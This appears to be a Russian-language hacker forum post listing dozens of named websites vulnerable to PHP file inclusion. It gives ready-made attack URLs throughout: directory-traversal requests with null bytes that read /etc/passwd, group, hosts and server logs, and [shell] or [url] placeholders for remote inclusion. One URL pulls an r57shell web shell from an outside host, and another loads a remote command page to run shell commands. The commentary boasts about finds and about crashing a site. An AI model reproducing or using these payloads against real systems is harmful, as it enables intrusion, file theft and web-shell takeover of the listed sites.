http://www.bookdjralph.com/index.php?Page=[url]
6. Unix. PR - 1.
http://www.dbrage.net/index6.php?page=[url]
7. Linux. PR - 3.
http://www.eumra.net/portal/html/home/sub.php?id=sub&link=[url]
8. Linux. PR - 3.
http://itihad.org/layout.php?f=[url]

PHP инъекции на сегодня.
1. Unix. PR - 0. Safe Mode = On. :(
http://www.ex-light.ru/pages/menu.php?id=[url]
2. Linux. PR - 3. Safe Mode = Off. :)
http://www.maagd.net/index.php?id=[url]
3. Unix. PR - 2. Safe Mod = Off.
http://www.samosir.go.id/detail_eng.php?buka=[url]
4. Unix. PR - 3. Safe Mod = Off.
http://www.animemegaverse.com/index.php?id=[url]
5. Linux. PR - 4. Safe Mode = Off.
http://www.kuratorium.krakow.pl/informator/Szko%B3y%20artystyczne/pliki.php?tresc=[url]
6. Unix. PR - 3. Safe Mode = Off.
http://www.dragonballmaster.com/index.php?id=[url]
7. Linux. PR - 3. Safe Mode = Off.
//Искал админки, наткнулся на инклуд :)
http://www.gafner-informatik.ch/index.php?action=[url]
8. Linux. PR - 2. Safe Mode = On.
//Снова искал админку, а нашёл инклуд.
http://www.zss.tarnow.pl/aktualnosci/full.php?plik=[url]

www.emule.com

http://www.emule.com/poetry/?page=../../../../../../../../etc/passwd%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/group%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/ftpusers%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/services%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/hosts%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/syslog.conf%00

www.enterpriseplants.com

http://www.enterpriseplants.com/other.php?page=../../../../etc/passwd%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/group%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/hosts%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/ftpusers%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/services%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/syslog.conf%00

www.theactorsretreat.com

http://www.theactorsretreat.com/?page=../../../../../../etc/passwd%00
http://www.theactorsretreat.com/?page=../../../../../../etc/group%00
http://www.theactorsretreat.com/?page=../../../../../../etc/ftpusers%00
http://www.theactorsretreat.com/?page=../../../../../../etc/services%00
Нашел логи, но нету прав на их чтение.
http://www.theactorsretreat.com/?page=../../../../../../var/log/httpd/access_log%00
http://www.theactorsretreat.com/?page=../../../../../../var/log/httpd/error_log%00

www.branchmanagerceo.com

http://www.branchmanagerceo.com/?page=../../../../../../../etc/passwd%00
http://www.branchmanagerceo.com/?page=../../../../../../../etc/group%00
http://www.branchmanagerceo.com/?page=../../../../../../../etc/ftpusers%00
http://www.branchmanagerceo.com/?page=../../../../../../../etc/hosts%00
ЛОГИ
http://www.branchmanagerceo.com/?page=../../../../../../../www/logs/error_log%00

www.kerryjohnson.com

http://www.kerryjohnson.com/index12.php?page=../../../../../etc/passwd
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/group
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/ftpusers
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/hosts
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/services
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/syslog.conf

www.sammf.com

http://www.sammf.com/?page=[shell]

www.cookiecr3ations.com

http://www.cookiecr3ations.com/index.php?page=[shell]

www.mapxolutions.com

http://www.mapxolutions.com/page.php?page=[shell]

www.strawsandsugar.com

http://www.strawsandsugar.com/index.php?page=[shell]

ptc36.com

http://ptc36.com/index.php?page=[shell]

=\\


http://web40.xps6.microserver.de/index.php?action=/etc/passwd
http://web40.xps6.microserver.de/index.php?action=/etc/group
http://web40.xps6.microserver.de/index.php?action=/etc/services
http://web40.xps6.microserver.de/index.php?action=/etc/syslog.conf

=\\
http://web40.xps6.microserver.de/index.php?action=/var/www/html/web40/html/index.php - рекурсия, однако :))
Так и заДДОСить можно :)

1. www.ovz.ch

http://www.ovz.ch/?page=[shell].php

2. www.ironclan.com

http://www.ironclan.com/eX/index.php?page=[shell].txt

3. fouleescholetaises.free.fr

http://fouleescholetaises.free.fr/index_psf.php?page=[shell].php

4. www.ultriplo.com

http://www.ultriplo.com/index.php?page=[shell].php

5. www.gmo-productions.be

http://www.gmo-productions.be/index.php?page=[shell].inc.php

6. muson.com.ua

http://muson.com.ua/products_service/humidifiers/site1.php?page=[shell].php

чото похожее на игру было раньше с таким названием=))
http://www.megabackgammon.com/backgammon-articles/read-articles/index.php?article=[shell]

как хорошо после душа.....сразу лезут пхп инж..=)

http://www.gojdic.sk/citaren/?zobrazit=[shell]

http://www.lineage2world.com/main/index.php?p=[index] локальный инклуд но толку от него нет :(

_http://www.fas. harvard.edu/~semitic/HOAI/adultmain.cgi?article=../../../../../../../../../../../etc/passwd
Вот.. давно разрабатывал, может кому пригодиться=)

_http://www.electhai.com/view.php?id=http://phpxsssql.narod.ru/cmd.htm&cmd=w hich%20fetch
А вот удаленный инклд на прикольном тайванском сервачке.

До сих пор эти ***** ничего не делают...
http://www.postnuke.ru/index.php?module=Static_Docs&func=view&f=../../../../../../../../../../../../../../../../../../../../opt/www/

http://ima-ag.ru/sitemap.php?inc=[url]

http://www.best-trade.ru/txt.php?textid=filials&pic1=foto024.jpg&parent=2&tail=tail.php&head=../../../../../etc/passwd&title1=%C6%C9%CC%C9%C1%CC%D9
http://www.nrcm.ru/main.php?BackGround=bk1.gif&content=http://no.spam.ee/~tonu/phpshell/r57shell.txt?&id=348&Back_Link=main.php

=\\


http://cdeam.ufam.edu.br/index.php?page=/etc/passwd
http://cdeam.ufam.edu.br/index.php?page=/etc/group
http://cdeam.ufam.edu.br/index.php?page=/etc/hosts
http://cdeam.ufam.edu.br/index.php?page=/etc/syslog.conf
http://cdeam.ufam.edu.br/index.php?page=/etc/ftpusers